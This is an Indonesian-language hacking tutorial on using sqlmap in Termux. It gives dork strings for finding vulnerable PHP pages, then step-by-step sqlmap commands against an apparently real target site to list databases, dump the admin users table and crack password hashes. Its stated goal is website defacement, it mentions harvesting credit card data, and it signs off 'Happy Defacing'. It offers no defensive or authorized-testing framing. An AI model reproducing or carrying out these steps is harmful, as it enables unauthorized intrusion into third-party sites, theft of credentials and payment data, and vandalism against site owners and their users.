SQL injection Using SQLMap Via Termux

Assalamualaikum.

 Ketemu lagi dengan aku selaku admin.
pada tutorial kali ini admin mau sharing tutorial  SQL injection menggunakan sqlmap di termux.

Oke simak baik-baik ya,

Bahan yg harus kalian punya : 
• Termux (silahkan download dulu di playstore)
• Web vuln sqli injection
• Jaringan yg lancar
• Kesabaran tentunya,dan
• Segelas semangat untuk memulai semuanya :)

Step by step :
• Install dulu termux nya 
• kalo udah ,ketik langkah nya dibawah ini

$ apt update -y && apt upgrade -y
$ pkg install nano -y
$ pkg install git -y
$ pkg install python -y
$ pkg install python2 -y 

Lalu install SQLMap nya 

$ git clone https://github.com/sqlmapproject/sqlmap.git
$ cd sqlmap
$ python2 sqlmap.py

Jika sudah terinstall semua lalu masukan dork dibawah ini di web browser kalian : 

Dork : 

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=

Terserah mau pilih yang mana ,disini admin udah ada web target jadi langsung eksekusi 

Ketik perintah : 

python2 sqlmap.py -u https://sitetarget.com/pages.php?id=2 --dbs

Kan keliatan tuh database web nya,pilih salah satu,disini aku pilih :

soccerfi_webdb

Kemudian untuk melihat table nya kita
ketik perintah :

python sqlmap.py -u "https://sitetarget.com/pages.php?id=2" --tables -D soccerfi_webdb

 Kan ada banyak tuh table yg muncul,pilih salah satu aja,berhubung tujuan kita untuk deface kita harus nyari username & password.
 Cari table yg berhubungan dengan username & password

Contoh :
• users
• admin,dll

Jika kalian beruntung ,kalian juga bisa  menemukan cc/credit card.

 Oke selanjutnya untuk melihat isi dari column kita ketik perintah :

python sqlmap.py -u "https://sitetarget.com/pages.php?id=2" --columns -D soccerfi_webdb -T users --columns

 Kemudian,untuk melihat isi dari username & password di atas
ketik perintah :

python sqlmap.py -u "https://socc/pages.php?id=2" --columns -D soccerfi_webdb -T users --dump

Dan taraaa...kita sudah mendapatkan username dan password admin.
 Disini aku beruntung karna password nya tidak terenkriprsi ,jika kalian mendapatkan password yg terenkripsi maka harus hash terlebih dahulu,bisa di

https://hashkiller.co.uk atau di
https://www.md5online.org



Jika password sudah ter hash , langkah selanjutnya tinggal mencari halaman admin login.


Mungkin cukup sampai disini ya,sampai ketemu di tutorial selanjutnya.

Jika masih kurang paham,bisa bertanya melalui fanspage kami di facebook :
https://m.facebook.com/sorong6etar/

Terima kasih sudah berkunjung,sampai jumpa.
Happy Defacing^~^